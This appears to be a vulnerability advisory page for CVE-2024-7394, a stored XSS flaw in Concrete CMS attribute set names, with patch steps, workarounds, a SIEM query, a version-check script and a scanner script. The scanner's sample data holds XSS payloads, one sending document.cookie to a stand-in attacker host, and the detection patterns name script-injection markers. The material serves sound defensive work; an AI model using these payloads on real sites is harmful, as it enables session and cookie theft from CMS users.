CVE-2024-7394

4.8 MEDIUM

📋 TL;DR

Concrete CMS 9.0.0 through 9.3.2 and all versions below 8.5.18 contain a stored cross-site scripting (XSS) vulnerability in the getAttributeSetName() function. An administrator (a "rogue admin") can save JavaScript inside an attribute set name; the stored payload then runs in the browser of any user who views a page that renders that name. Every installation on an affected version is exposed, but exploitation needs an administrator account and a victim who opens the affected page, which is why the CVSS score is only 4.8.

💻 Affected Systems

Products:
  • Concrete CMS
Versions: Concrete CMS 9.0.0 through 9.3.2, and all versions below 8.5.18
Operating Systems: All operating systems running Concrete CMS
Default Config Vulnerable: ⚠️ Yes
Notes: All default configurations of affected versions are vulnerable. Exploitation requires administrator privileges.

📦 What is this software?

Concrete CMS (formerly concrete5) is an open-source content management system written in PHP. Site administrators manage content, users, permissions and custom attributes through an in-browser dashboard, which is where attribute set names are created and displayed.

⚠️ Risk & Real-World Impact

🔴 Worst Case

A malicious administrator's payload executes in the browser of every user who opens the affected page, including other administrators. The script can read any cookie the browser exposes to JavaScript, send the victim to a phishing page, or issue requests to the CMS with the victim's session, which can end in account takeover or data theft.

🟠 Likely Case

A rogue administrator injects a script into an attribute set name; it runs in the browsers of other CMS users, harvesting session material or performing unauthorized dashboard actions as them.

🟢 If Mitigated

With proper administrator vetting and monitoring, the impact is limited: exploitation requires administrative privileges, so the attacker already holds a highly privileged account, and the issue is one of escalation to other users' sessions rather than initial access.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires administrative access to the Concrete CMS instance. The attribute set name is accepted as typed and later emitted by getAttributeSetName() into HTML without escaping, so any markup or script stored in the name is parsed and executed by the victim's browser. A victim must view an affected page for the payload to fire (user interaction is required).

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Concrete CMS 9.3.3 or 8.5.18

Vendor Advisory: https://documentation.concretecms.org/9-x/developers/introduction/version-history/933-release-notes

Restart Required: No

Instructions:

1. Back up the Concrete CMS installation and its database.
2. Update to Concrete CMS 9.3.3 (for 9.x) or 8.5.18 (for 8.x).
3. Confirm the new version number in the dashboard or in the 'version' entry of concrete/config/concrete.php.
4. Clear the CMS cache (the dashboard's Cache & Speed Settings page) so no pre-update rendered output is served.
5. Patching does not change rows already in the database: review existing attribute set names for HTML or script and delete or rename any that contain it.

🔧 Temporary Workarounds

Input Sanitization Enhancement (platform: all)

Add output encoding (and, secondarily, input validation) wherever attribute set names are rendered. No command: this requires modifying CMS code, so it is rarely practical and should be reverted once the official patch is applied.

Administrator Access Restriction (platform: all)

Limit administrator accounts to trusted personnel only and use role-based access so that content editors do not hold full administrator rights. No command: this is a configuration change within the CMS.

🧯 If You Can't Patch

  • Deploy a Content Security Policy that disallows inline script; this blunts the injected payload, but test it against the dashboard first, since admin pages that rely on inline JavaScript will break under a strict policy
  • Monitor administrator activity and audit logs, in particular edits to attribute sets, for unexpected changes

🔍 How to Verify

Check if Vulnerable:

Check your Concrete CMS version. If running version 9.0.0-9.3.2 or any version below 8.5.18, you are vulnerable.

Check Version:

Check the version shown in the Concrete CMS dashboard (System & Settings > Update), or read the 'version' entry of the array returned by concrete/config/concrete.php.

Verify Fix Applied:

After updating, verify you are running Concrete CMS 9.3.3 or later (for 9.x) or 8.5.18 or later (for 8.x).
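As an added example (mine, not from the advisory or the Concrete CMS project), the Python below reads the 'version' entry out of concrete/config/concrete.php and applies the affected ranges stated above. The config excerpt is a constructed sample; the regex assumes the file's `'version' => '...'` array entry, which is how the stock file is laid out, and the verdict covers only this CVE's ranges, nothing else about the install.

```python
import re

# Constructed sample of the relevant lines from concrete/config/concrete.php;
# not copied from any real installation.
SAMPLE_CONFIG = """<?php
return [
    'version' => '9.3.2',
    'version_installed' => '9.3.2',
];
"""

# Matches the 'version' key only; 'version_installed' has a different quoted key.
_VERSION_RE = re.compile(r"'version'\s*=>\s*'([0-9][^']*)'")


def parse_version(config_text: str) -> str:
    """Return the 'version' value from the concrete.php array, or raise if absent."""
    m = _VERSION_RE.search(config_text)
    if not m:
        raise ValueError("no 'version' entry found in config text")
    return m.group(1)


def version_tuple(version: str) -> tuple:
    """'9.3.2' -> (9, 3, 2); any '-rc1' style suffix is dropped before comparing."""
    core = version.split("-", 1)[0]
    parts = [int(p) for p in core.split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def is_vulnerable(version: str) -> bool:
    """CVE-2024-7394 ranges from the advisory: 9.0.0-9.3.2, and everything below 8.5.18."""
    v = version_tuple(version)
    if v[0] == 9:
        return v < (9, 3, 3)
    if v[0] <= 8:
        return v < (8, 5, 18)
    return False  # 10.x and later are outside the advisory's affected ranges


def check_config(config_text: str) -> dict:
    """Parse the config text and report the version plus the CVE-2024-7394 verdict."""
    version = parse_version(config_text)
    return {"version": version, "vulnerable": is_vulnerable(version)}


if __name__ == "__main__":
    import sys

    # Usage: python check_concrete_version.py /path/to/concrete/config/concrete.php
    # With no argument the constructed sample above is checked instead.
    path = sys.argv[1] if len(sys.argv) > 1 else None
    text = open(path, encoding="utf-8").read() if path else SAMPLE_CONFIG
    print(check_config(text))
```

Run it against the real file after the update as well: the expected result is `vulnerable: False` with the version reading 9.3.3 / 8.5.18 or later.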

📡 Detection & Monitoring

Log Indicators:

  • Unusual administrator activity creating or renaming attribute sets
  • Attribute set names in the database that contain HTML tags, javascript: URLs or on* event-handler attributes

Network Indicators:

  • Unexpected outbound connections from CMS pages to external domains

SIEM Query:

source="concrete_cms_logs" AND (event="attribute_set_modified" OR event="admin_activity") AND (message="*<script*" OR message="*javascript:*" OR message="*onerror=*" OR message="*onload=*")

The source and event names above are placeholders; substitute the index and field names your log pipeline assigns to Concrete CMS logs, and keep the pattern list broad, since a payload need not contain the literal word "script".
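As an added example (not from the page or the project), the Python below covers the database indicator in the Detection section and the output-encoding workaround above: it scans exported attribute set names for markup and script indicators, and it renders one name the unpatched way beside an output-escaped rendering so the difference is concrete. The rows are constructed samples; the SELECT string assumes the stock AttributeSets table with an asName column (verify against your schema), and the escaped renderer is my own illustration of output encoding, not the vendor's patch.

```python
import html
import re

# Assumed export query: the stock schema keeps attribute sets in the AttributeSets
# table with an asName column. Check the table and column names on your database.
EXPORT_QUERY = "SELECT asID, asHandle, asName FROM AttributeSets"

# Constructed sample rows shaped like that query's result; not taken from any real site.
SAMPLE_ROWS = [
    (1, "basics", "Basics"),
    (2, "seo", "SEO & Sharing"),
    (3, "x1", "Extra <script>fetch('https://attacker.example/?c=' + document.cookie)</script>"),
    (4, "x2", "Team <img src=x onerror=alert(1)>"),
    (5, "x3", "Links javascript:alert(1)"),
    (6, "music", "Rock & Roll"),
]

# A plain display name never legitimately contains any of these.
_INDICATORS = {
    "html_tag": re.compile(r"<\s*/?\s*[a-z!]", re.I),   # opening of any tag or comment
    "javascript_url": re.compile(r"javascript\s*:", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),  # onerror=, onload=, ...
}


def find_indicators(name: str) -> list:
    """Labels of the indicator patterns that match the name, in a fixed order."""
    return [label for label, pat in _INDICATORS.items() if pat.search(name)]


def scan_rows(rows) -> list:
    """Return (asID, asHandle, asName, indicators) for every row that looks injected."""
    hits = []
    for as_id, handle, name in rows:
        found = find_indicators(name)
        if found:
            hits.append((as_id, handle, name, found))
    return hits


def render_unpatched(name: str) -> str:
    # The failure the advisory describes: the stored name is emitted into HTML as-is,
    # so the browser parses any tags or handlers it contains.
    return f"<li>{name}</li>"


def render_patched(name: str) -> str:
    # Output encoding (the PHP equivalent is htmlspecialchars): the same stored name
    # becomes inert text. My illustration of what a fix achieves, not the vendor's code.
    return f"<li>{html.escape(name, quote=True)}</li>"


if __name__ == "__main__":
    print("rows to export:", EXPORT_QUERY)
    for as_id, handle, name, found in scan_rows(SAMPLE_ROWS):
        print(f"asID={as_id} handle={handle} indicators={found}")
        print("  unpatched:", render_unpatched(name))
        print("  escaped:  ", render_patched(name))
```

Feed real rows to scan_rows() after exporting them with the query (or your equivalent); legitimate names with an ampersand, like the "SEO & Sharing" sample, are not flagged, so hits should be rare enough to review by hand.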

🔗 References

  • Vendor release notes: https://documentation.concretecms.org/9-x/developers/introduction/version-history/933-release-notes
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2024-7394